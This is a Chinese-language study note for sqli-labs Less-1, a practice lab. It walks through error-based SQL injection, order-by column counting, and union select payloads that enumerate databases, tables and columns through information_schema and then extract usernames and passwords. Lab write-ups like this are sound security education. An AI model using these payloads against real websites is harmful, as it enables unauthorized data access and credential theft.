sqli-labs less1 学习笔记

• 初学的时候我们可以在源代码中$sql下一句语句写以下php语句

    echo "你的 sql 语句是：".$sql."<br>"; 

• 先在URL栏中输入?id=1
• 尝试在1后面加' 发现报错
• 从上述错误当中，我们可以看到提交到sql中的1'在经过sql语句构造后形成 '1'' LIMIT 0,1，多加了一个 ' 。这种方式就是从错误信息中得到我们所需要的信息，那我们接下来想如何将多余的 ' 去掉呢？

• 尝试 'or 1=1--+

  此时构造的sql语句就成了

  Select ****** where id='1'or 1=1--+' LIMIT 0,1  发现正常返回数据

• 那么下面尝试union注入 我们先看一下字段数有多少 。因为union的作用是将两个sql语句进行联合。union前后的两个sql语句的选择列数要相同才可以。Union all与union 的区别是增加了去重的功能。 输入 'order by --+ 发现可以返回  'order by 4--+出现下面的错误，于是我们知道字段数有三个。

• 当id的数据在数据库中不存在时，（此时我们可以id=-1，两个sql语句进行联合操作时，当前一个语句选择的内容为空，我们这里就将后面的语句的内容显示出来）此处前台页面返回了我们构造的union 的数据。 输入

  -1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1 爆数据库

  
  
  
  
• 输入-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ 

  爆security数据库的数据表

  
  

  

• 输入 -1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ 爆users列表

• -1'union select 1,username,password from users where id=2--+ LIMIT 0,1 爆数据

   

  
  
  
  
• 成功完成注入